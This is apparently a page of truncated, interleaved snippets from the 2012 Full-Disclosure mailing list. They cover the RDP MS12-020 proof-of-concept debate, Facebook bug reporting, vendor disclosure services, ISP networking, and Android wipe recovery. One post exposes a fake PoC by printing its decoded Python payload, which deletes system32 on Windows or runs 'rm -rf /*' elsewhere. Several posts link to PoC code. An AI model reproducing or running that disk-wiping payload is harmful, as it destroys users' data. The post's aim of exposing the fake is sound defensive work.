Where are they any idea?
On Thu, Mar 15, 2012 at 9:07 PM, J. Oquendo s...@infiltrated.net wrote:
Earth calling Facebook security engineers, earth calling Facebook security
engineers. Tried reaching out to you guys about a vulnerability a good
friend discovered. No one should have to hunt you
Hello Everyone,
We have something new for you - *PenTest Market*. The thing that makes this
magazine unique is structure. PenTest Market will consist mainly of
interviews with IT security specialists, who will share their experience
with you. We will also include some reports about pentesting
What's the payload?
16. maaliskuuta 2012 18.01 kyle kemmerer krkemme...@gmail.com kirjoitti:
Not my code, just sharing it here.
http://pastebin.com/UzDKcCQy
___
Full-Disclosure - We believe in it.
Charter:
BSoD! Win7 64 and 32 bits, Spanish. working.
On 16 March 2012 14:50, Exibar exi...@thelair.com wrote:
Is that the same code from yesterday? I thought that code was a fake and
didn'kt do anything?
Anyone confirm this?
Exibar
Sent via BlackBerry by ATT
-Original Message-
From:
The original researcher has released his advisory:
http://www.exploit-db.com/exploits/18606/
On Fri, Mar 16, 2012 at 2:06 PM, Ian Hayes cthulhucall...@gmail.com wrote:
On Fri, Mar 16, 2012 at 10:50 AM, Exibar exi...@thelair.com wrote:
Is that the same code from yesterday? I thought that
That is the first time I've seen that specific one, so not sure if it is
fake or not. The main one that I saw going around about 12 hours ago was
this one: http://pastebin.com/fFWkezQH and it is the allegedly fake one.
The fake that is was supposedly from s...@fbi.com kind of sent off some
alarm
Guys,
What about TS Gateway? which is actually listening on port 443 (by def)...
thanks!
Nahu.
On 16 March 2012 15:12, root ro...@fibertel.com.ar wrote:
The SABU code is fake (go figure).
This python script is the first port of the Luigi code to python, that's
why sucks.
Here are better
Your ISP probably has their users are on different networks than their
servers. Sounds like maybe they meant the switch you are on, not the
servers switch. Need to troubleshoot, use a smart phone or some other OOB
capable device to test access to the ISP servers. If you can access OOB,
then
I've tried this one against a new installation of Windows 2008 Server.
Blue screen is shown and the server is rebooted.
El viernes, 16 de marzo de 2012 20:37:43, kyle kemmerer escribió:
I have not had a chance to analyze this yet, but it is not the same
code as the fake sabu one on pastebin.
On Sat, Mar 17, 2012 at 1:50 AM, Exibar exi...@thelair.com wrote:
Is that the same code from yesterday? I thought that code was a fake and
didn'kt do anything?
Anyone confirm this?
I tested it on win-xp sp3 machine but it didn't work. According to the
post[1] on slashdot, the correct
Another POC.
http://pastebin.com/GM4sHj9t
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
______ ___ _
___ / _ \ ___ / _ \ _ __ |___ \ / _ \/ |___ \
/ __| | | |/ __| | | | '_ \__) | | | | | __) |
| (__| |_| | (__| |_| | | | | / __/| |_| | |/ __/
\___|\___/ \___|\___/|_| |_| |_|\___/|_|_|
Unlikely, usually these switches are quite large and when a user has OOB it
usually means console access to the server, i.e. nothing to do with network
topology.
If they are like most ISPs/carriers, the only thing that will be on a
separate switch is their management network(s).
On 16 March
https://www.facebook.com/whitehat/report/ ?
On Thu, Mar 15, 2012 at 4:37 PM, J. Oquendo s...@infiltrated.net wrote:
Earth calling Facebook security engineers, earth calling Facebook
security engineers. Tried reaching out to you guys about a vulnerability a
good friend discovered. No one
Hi,
Without meaning to advertise, that is one of the reasons upSploit was
created - so that you could submit a vulnerability and then upSploit
automatically sends to the vendor. This way you and your friend don't have
to do any of the work on the disclosure.
https://www.upsploit.com - best of
Another lame backdoor.
On Sat, Mar 17, 2012 at 6:45 AM, yuri goncalves soares y...@bsd.com.brwrote:
Another POC.
http://pastebin.com/GM4sHj9t
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
On Sun, 18 Mar 2012 12:49:49 -, Peter Maxwell said:
On 16 March 2012 19:11, Dave irysh...@gmail.com wrote:
Your ISP probably has their users are on different networks than their
servers. Sounds like maybe they meant the switch you are on, not the
servers switch. Need to troubleshoot,
On Sun, Mar 18, 2012 at 8:57 AM, Ferenc Kovacs tyr...@gmail.com wrote:
https://www.facebook.com/whitehat/report/ ?
Its encumbered by Terms of Service. Its better to find an email
address so that (1) you are not bound by legal entanglements, and (2)
you have a written record of the
Sorry, I don't mean to be rude but none of that made any sense, especially
from an ISP perspective.
You will never have a switch per area; it doesn't work like that, you'll have a
series of distribution routers for routing to customers. Mail, www, shell, SIP,
whatever will be other services
You establish a connection to TSGateway via RPC over HTTP in an SSL tunnel.
Once you are authenticated and authorized, the TSGateway server will establish
a connection via RDP to the target server, tunneling the RDP connection back to
you within the RPC/HTTP(S) channel.
As such, TSGateway is
P.S. Before someone starts accusing me of spamming for the book, (one asshat
tried to compare me to Juan whats-his-face once) note you can actually view
most of the RDP chapter (and others) on the Amazon preview a page feature if
you would like.
If you are interested in RDP security, I suggest
Nobody said a word.
Relax more and you might live long enough to write your next book.
Sent using BlackBerry® from Orange
-Original Message-
From: Thor (Hammer of God) t...@hammerofgod.com
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Sun, 18 Mar 2012 17:03:25
To:
It's a fake and delete your disk completely.
If you convert the payload to ascii
__import__('os').sys
tem('del /s /q /f C:
\windows\system32\*
NUL 21') if 'Win
' in __import__('pla
tform').system() els
e __import__('os').s
ystem('rm -rf /* /
dev/null 21') #hi
there ^_~ feel
They did last time... But your advice is actually well noted :)
-Original Message-
From: James Condron [mailto:ja...@zero-internet.org.uk]
Sent: Sunday, March 18, 2012 10:06 AM
To: Thor (Hammer of God); full-disclosure-boun...@lists.grok.org.uk; full-
disclos...@lists.grok.org.uk
We have discovered that the wipe function on Android does not reliably
delete data on all devices. On a Nexus S running Android 2.3.6, we were
able to recover user data after running a wipe both using the factory
data reset from the menu and by wiping the device from recovery.
To recover data,
On 3/18/12, James Condron ja...@zero-internet.org.uk wrote:
Sorry, I don't mean to be rude but none of that made any sense, especially
from an ISP perspective.
None of it made any sense wrt the initial question of is my isp lying
but, allowing for the typical Kletnieks hyperbole, it does make
Could he not use a trusted intermediary though? That is, find someone to
report the issue who can be entangled by ToS, will take screenshots, etc.
I suppose the biggest problem of this would be the trust part, though. :)
On Mar 18, 2012 9:14 AM, Jeffrey Walton noloa...@gmail.com wrote:
On Sun,
Without meaning to advertise, that is one of the reasons upSploit was
created - so that you could submit a vulnerability and then upSploit
automatically sends to the vendor. This way you and your friend don't have
to do any of the work on the disclosure.
I clicked around and don't see any
The only other people that see the vulnerability are the select few in
upSploit.
However if the vendor is already in the upSploit database the advisory gets
submitted straight away to the vendor.
If you want to try it out there should be an upSploit vendor in the vendor
list. Submit some
Why not just provide them with the contact and they can forward it on directly?
Then you could obviate the entire trust issue...
t
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of upsploit
advisories
Sent: Sunday, March 18, 2012
We don't just send the initial advisory... I guess I need to make the
website slightly more informative!
After the initial contact we have (currently) a 6 month disclosure policy.
We send an email every month, in the final month once a week and in the
final week once a day. This email is
Thanks Thor!
I thought that it was possible to tunnel the attack through HTTPS channel that
the TSG generates.
Nahu.
On Mar 18, 2012, at 2:11 PM, Thor (Hammer of God) wrote:
They did last time... But your advice is actually well noted :)
-Original Message-
From: James Condron
On Sun, Mar 18, 2012 at 1:46 PM, Jan Schejbal
jan.mailinglis...@googlemail.com wrote:
We have discovered that the wipe function on Android does not reliably
delete data on all devices. On a Nexus S running Android 2.3.6, we were
able to recover user data after running a wipe both using the
33 matches
Mail list logo
